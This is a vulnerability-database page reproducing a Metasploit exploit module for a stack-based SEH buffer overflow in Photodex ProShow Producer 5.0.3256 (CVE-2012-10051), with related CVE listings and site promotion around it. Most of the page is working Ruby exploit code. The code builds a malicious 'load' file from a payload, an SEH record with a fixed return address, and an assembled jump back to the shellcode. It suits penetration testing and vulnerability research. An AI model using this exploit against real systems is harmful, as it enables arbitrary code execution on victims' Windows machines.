Lucene search
+L

Photodex ProShow Producer 5.0.3256 load File Handling Buffer Overflow

🗓️ 06 Jun 2012 00:00:00Reported by Julien Ahrens, mr.pr0n, juan vazquez <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 20 Views

Photodex ProShow Producer 5.0.3256 load File Handling Buffer Overflow module exploits a stack-based buffer overflow in Photodex ProShow Producer v5.0.3256. An attacker must send the crafted "load" file to the victim, who must store it in the installation directory. The vulnerability will be triggered the next time ProShow is opened. The module has been tested successfully on Windows XP SP3 and Windows 7 SP1

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2012-10051
29 May 201815:50
circl
cnnvd
CNNVD
Photodex ProShow Producer 安全漏洞
8 Aug 202500:00
cnnvd
cve
CVE
CVE-2012-10051
8 Aug 202518:11
cve
cvelist
Cvelist
CVE-2012-10051 Photodex ProShow Producer 5.0.3256 load File Handling Buffer Overflow
8 Aug 202518:11
cvelist
euvd
EUVD
EUVD-2012-6585
7 Oct 202500:30
euvd
nvd
NVD
CVE-2012-10051
8 Aug 202519:15
nvd
ptsecurity
Positive Technologies
PT-2025-32404 · Photodex · Proshow Producer
8 Aug 202500:00
ptsecurity
redhatcve
RedhatCVE
CVE-2012-10051
10 Aug 202518:14
redhatcve
vulnrichment
Vulnrichment
CVE-2012-10051 Photodex ProShow Producer 5.0.3256 load File Handling Buffer Overflow
8 Aug 202518:11
vulnrichment
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::Remote::Seh
  include Msf::Auxiliary::Report

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Photodex ProShow Producer 5.0.3256 load File Handling Buffer Overflow',
        'Description' => %q{
          This module exploits a stack-based buffer overflow in Photodex ProShow Producer
          v5.0.3256 in the handling of the plugins load list file. An attacker must send the
          crafted "load" file to victim, who must store it in the installation directory. The
          vulnerability will be triggered the next time ProShow is opened. The module has been
          tested successfully on Windows XP SP3 and Windows 7 SP1.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Julien Ahrens', # Vulnerability discovery and PoC
          'mr.pr0n', # Additional PoC
          'juan vazquez', # Metasploit module
        ],
        'References' => [
          [ 'CVE', '2012-10051' ],
          [ 'OSVDB', '83745' ],
          [ 'EDB', '19563' ],
          [ 'EDB', '20036' ],
          [ 'URL', 'http://security.inshell.net/advisory/30' ]
        ],
        'DefaultOptions' => {
          'EXITFUNC' => 'process',
        },
        'Payload' => {
          'Space' => 9844,
          'BadChars' => "\x00\x0a\x0d",
          'StackAdjustment' => -3500,
        },
        'Platform' => 'win',
        'Targets' => [
          [
            'Photodex ProShow Producer 5.0.3256 / Windows XP SP3 / Windows 7 SP1',
            {
              'Offset' => 9844,
              'Ret' => 0x1022A959 # p/p/r from if.dnt
            }
          ],
        ],
        'Privileged' => false,
        'DisclosureDate' => '2012-06-06',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        OptString.new('FILENAME', [ true, 'The file name.', 'load']),
      ]
    )
  end

  # Overriding file_create to allow the creation of a file without extension
  def file_create(data)
    fname = datastore['FILENAME']
    ltype = "exploit.fileformat.#{self.shortname}"

    if !::File.directory?(Msf::Config.local_directory)
      FileUtils.mkdir_p(Msf::Config.local_directory)
    end

    path = File.join(Msf::Config.local_directory, fname)
    full_path = ::File.expand_path(path)
    File.open(full_path, "wb") { |fd| fd.write(data) }

    report_note(:data => { :full_path => full_path.dup }, :type => "#{ltype}.localpath")

    print_good "#{fname} stored at #{full_path}"
  end

  def exploit
    sploit = payload.encoded
    sploit << generate_seh_record(target.ret)
    # jmp back to the payload
    sploit << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-#{target['Offset'] + 8}").encode_string
    # cause exception hitting the end of the stack
    sploit << rand_text(300)

    print_status("Creating '#{datastore['FILENAME']}' file ...")
    file_create(sploit)
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation